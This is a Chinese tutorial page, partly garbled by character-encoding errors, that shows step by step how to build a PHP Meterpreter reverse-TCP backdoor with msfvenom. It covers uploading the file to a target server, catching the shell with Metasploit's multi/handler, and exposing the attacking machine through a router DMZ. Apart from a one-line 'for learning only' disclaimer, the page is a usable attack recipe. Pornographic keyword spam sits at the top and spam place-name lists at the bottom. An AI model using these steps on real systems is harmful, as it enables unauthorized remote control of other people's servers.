国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發(fā) > PHP > 正文

metasploit框架PHP反向后門建立教程

2024-05-04 21:50:21
字體:
供稿:網(wǎng)友

Metasploit簡介

灰帽黑客(第3版) Metasploit是一個免費的、可下載的框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊。它本身附帶數(shù)百個已知軟件漏洞的專業(yè)級漏洞攻擊工具。當(dāng)H.D. Moore在2003年發(fā)布Metasploit時,計算機安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個人都可以使用攻擊工具來攻擊那些未打過補丁或者剛剛打過補丁的漏洞。軟件廠商再也不能推遲發(fā)布針對已公布漏洞的補丁了,這是因為Metasploit團隊一直都在努力開發(fā)各種攻擊工具,并將它們貢獻給所有Metasploit用戶

metasploit框架PHP反向后門建立

  1. msfvenom -l  查看所有payload 
  2. Framework Payloads (436 total) 
  3. ============================== 
  4.     Name                                                Description 
  5.     ----                                                ----------- 
  6.     aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell 
  7.     aix/ppc/shell_find_port                             Spawn a shell on an established connection 
  8.     aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs) 
  9.     aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell 

其他的省略。

這里要使用的是PHP反向后門

  1. msfvenom -p php/meterpreter/reverse_tcp --payload-options  查看參數(shù) 
  2. Options for payload/php/meterpreter/reverse_tcp: 
  3.  
  4.        Name: PHP Meterpreter, PHP Reverse TCP Stager 
  5.      Module: payload/php/meterpreter/reverse_tcp 
  6.    Platform: PHP 
  7.        Arch: php 
  8. Needs Admin: No 
  9.  Total size: 936 
  10.        Rank: Normal 
  11. Provided by: 
  12.     egypt <egypt@metasploit.com> 
  13. Basic options: 
  14. Name   Current Setting  Required  Description 
  15. ----   ---------------  --------  ----------- 
  16. LHOST                   yes       The listen address 
  17. LPORT  4444             yes       The listen port 
  18. Description: 
  19.   Run a meterpreter server in PHP. Reverse PHP connect back stager 
  20.   with checks for disabled functions 

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw >c.php 生成腳本

生成后要將腳本最前面的注釋符去掉,然后上傳到目標(biāo)服務(wù)器上

啟動msf

use exploit/multi/handler

set PAYLOAD php/meterpreter/reverse_tcp

set LHOST 192.168.1.2

set LPORT 1234

exploit 啟動監(jiān)聽

然后從瀏覽器中打開上傳的腳本http://xxx.com/c.php

msf中就會看到

  1. *] Starting the payload handler... 
  2. [*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX 
  3. [*] Meterpreter session 1 opened (192.168.1.2:1234 -> xxx.xxx.xxx.xxx:42280) at 
  4. meterpreter > 

如果kali安裝在虛擬機上,需要橋接,然后路由器上將kali DMZ到外網(wǎng)

注意:此教程只用于學(xué)習(xí)使用其它一切后果與本站無關(guān)。

發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 新巴尔虎左旗| 临海市| 香港| 额敏县| 神农架林区| 大新县| 三亚市| 乌什县| 合山市| 彭阳县| 南城县| 元阳县| 黄骅市| 怀化市| 博罗县| 岳阳县| 闽侯县| 辽源市| 丰宁| 台安县| 博客| 土默特右旗| 博野县| 施甸县| 阜新市| 洛宁县| 尼勒克县| 锦屏县| 泽州县| 大埔县| 万年县| 宜宾县| 房山区| 泽普县| 沁阳市| 新巴尔虎左旗| 伊吾县| 香港| 武宣县| 册亨县| 临高县|